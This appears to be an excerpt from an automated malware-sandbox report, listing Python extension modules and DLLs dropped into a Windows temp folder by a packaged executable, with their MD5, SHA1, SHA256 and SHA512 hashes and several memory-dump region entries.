C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_overlapped.pyd

MD5 d3be208dc5388225162b6f88ff1d4386
SHA1 8effdb606b6771d5fdf83145de0f289e8ad83b69
SHA256 ce48969ebebdc620f4313eba2a6b6cda568b663c09d5478fa93826d401abe674
SHA512 9e1c3b37e51616687eecf1f7b945003f6eb4291d8794fea5545b4a84c636007eb781c18f6436039df02a902223ac73efac9b2e44ddc8594db62feb9997475da3

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\websockets\speedups.pyd

MD5 99480b51453f6f78ee60954cac18454d
SHA1 4cb835152039ffcbd398f8b24fed39aae92566ed
SHA256 ebd0130532db4ea3ecb1d52a85d166714c0cd2817145e4d2616e780c6614bc43
SHA512 2b35860408dda6eb9e9ae6900e46bc2ea05e2338b62de2f484ee1b86135da4e0a849cba6bae28a52771692e54bd4779cbd69343edb13d70b387f44d7ed0aed73

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_decimal.pyd

MD5 baaa9067639597e63b55794a757ddeff
SHA1 e8dd6b03ebef0b0a709e6cccff0e9f33c5142304
SHA256 6cd52b65e11839f417b212ba5a39f182b0151a711ebc7629dc260b532391db72
SHA512 7995c3b818764ad88db82148ea0ce560a0bbe9594ca333671b4c5e5c949f5932210edbd63d4a0e0dc2daf24737b99318e3d5daaee32a5478399a6aa1b9ee3719

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\unicodedata.pyd

MD5 57f8f40cf955561a5044ddffa4f2e144
SHA1 19218025bcae076529e49dde8c74f12e1b779279
SHA256 1a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560
SHA512 db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_uuid.pyd

MD5 3a09b6db7e4d6ff0f74c292649e4ba96
SHA1 1a515f98946a4dccc50579cbcedf959017f3a23c
SHA256 fc09e40e569f472dd4ba2ea93da48220a6b0387ec62bb0f41f13ef8fab215413
SHA512 8d5ea9f7eee3d75f0673cc7821a94c50f753299128f3d623e7a9c262788c91c267827c859c5d46314a42310c27699af5cdfc6f7821dd38bf03c0b35873d9730f

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_bz2.pyd

MD5 28ede9ce9484f078ac4e52592a8704c7
SHA1 bcf8d6fe9f42a68563b6ce964bdc615c119992d0
SHA256 403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09
SHA512 8c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_ssl.pyd

MD5 66e78727c2da15fd2aac56571cd57147
SHA1 e93c9a5e61db000dee0d921f55f8507539d2df3d
SHA256 4727b60962efacfd742dca21341a884160cf9fcf499b9afa3d9fdbcc93fb75d0
SHA512 a6881f9f5827aceb51957aaed4c53b69fcf836f60b9fc66eeb2ed84aed08437a9f0b35ea038d4b1e3c539e350d9d343f8a6782b017b10a2a5157649abbca9f9a

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\select.pyd

MD5 8472d39b9ee6051c961021d664c7447e
SHA1 b284e3566889359576d43e2e0e99d4acf068e4fb
SHA256 8a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f
SHA512 309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_hashlib.pyd

MD5 c888ecc8298c36d498ff8919cebdb4e6
SHA1 f904e1832b9d9614fa1b8f23853b3e8c878d649d
SHA256 21d59958e2ad1b944c4811a71e88de08c05c5ca07945192ab93da5065fac8926
SHA512 7161065608f34d6de32f2c70b7485c4ee38cd3a41ef68a1beacee78e4c5b525d0c1347f148862cf59abd9a4ad0026c2c2939736f4fc4c93e6393b3b53aa7c377

memory/2452-83-0x00007FF6B5C70000-0x00007FF6B7430000-memory.dmp

memory/4688-85-0x00007FFE5B860000-0x00007FFE5C7EC000-memory.dmp

memory/4688-84-0x00007FF698460000-0x00007FF69AF26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\zstandard\backend_c.pyd

MD5 baf4db7977e04eca7e4151da57dc35d6
SHA1 80c70496375037ca084365e392d903dea962566c
SHA256 1a2ec2389c1111d3992c788b58282aaf1fc877b665b195847faf58264bf9bc33
SHA512 9b04f24ee61efa685c3af3e05000206384ec531a120209288f8fdc4fb1ec186c946fd59e9eb7381e9077bfbcfc7168b86a71c12d06529e70a7f30e44658a4950

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\win32security.pyd

MD5 0007e4004ee357b3242e446aad090d27
SHA1 4a26e091ca095699e6d7ecc6a6bfbb52e8135059
SHA256 10882e7945becf3e8f574b61d0209dd7442efd18ab33e95dceececc34148ab32
SHA512 170fa5971f201a18183437fc9e97dcd5b11546909d2e47860a62c10bff513e2509cb4082b728e762f1357145df84dcee1797133225536bd15fc87b2345659858

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\charset_normalizer\md__mypyc.pyd

MD5 f4192b63f194d4b4e420e319f08fd398
SHA1 03e2f59492e05f899cb5399a4971b3ee700f00c1
SHA256 0be6ce456259ec228b1e42b8406d6eecf4c9fc4c96b9c3dc6255695f539bfdca
SHA512 447f4909a742e3f2abbe37c2f02d1e9106ded7be5c1d3c1bcbe3985d61791c2eac85bfc9870518fb6d99c7bd32a73c99e9961b797aeee95756f59bf0d2038009

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\charset_normalizer\md.pyd

MD5 25e5dd43a30808f30857c6e46e6bc8df
SHA1 679cb7169813a9a0224f03624984645ea18aabe6
SHA256 62639a735008dd068142c0efca7f3d0f96f4959a52278fcf70012946e8552974
SHA512 904855da98f610a6ebe18ba76f7130a7f9a0ba5da0364fbc9ce79127728597c473aa85f8c0ccaf9f0af81da8f4e6ad7b722890839ee03f381e50177301661cc3

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\vcruntime140_1.dll

MD5 7e668ab8a78bd0118b94978d154c85bc
SHA1 dbac42a02a8d50639805174afd21d45f3c56e3a0
SHA256 e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f
SHA512 72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\pywintypes311.dll

MD5 90b786dc6795d8ad0870e290349b5b52
SHA1 592c54e67cf5d2d884339e7a8d7a21e003e6482f
SHA256 89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a
SHA512 c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

memory/4688-99-0x00007FF698460000-0x00007FF69AF26000-memory.dmp

memory/4688-111-0x00007FF698460000-0x00007FF69AF26000-memory.dmp

memory/4688-117-0x00007FFE5B860000-0x00007FFE5C7EC000-memory.dmp

memory/4688-116-0x00007FF698460000-0x00007FF69AF26000-memory.dmp

memory/2452-126-0x00007FF6B5C70000-0x00007FF6B7430000-memory.dmp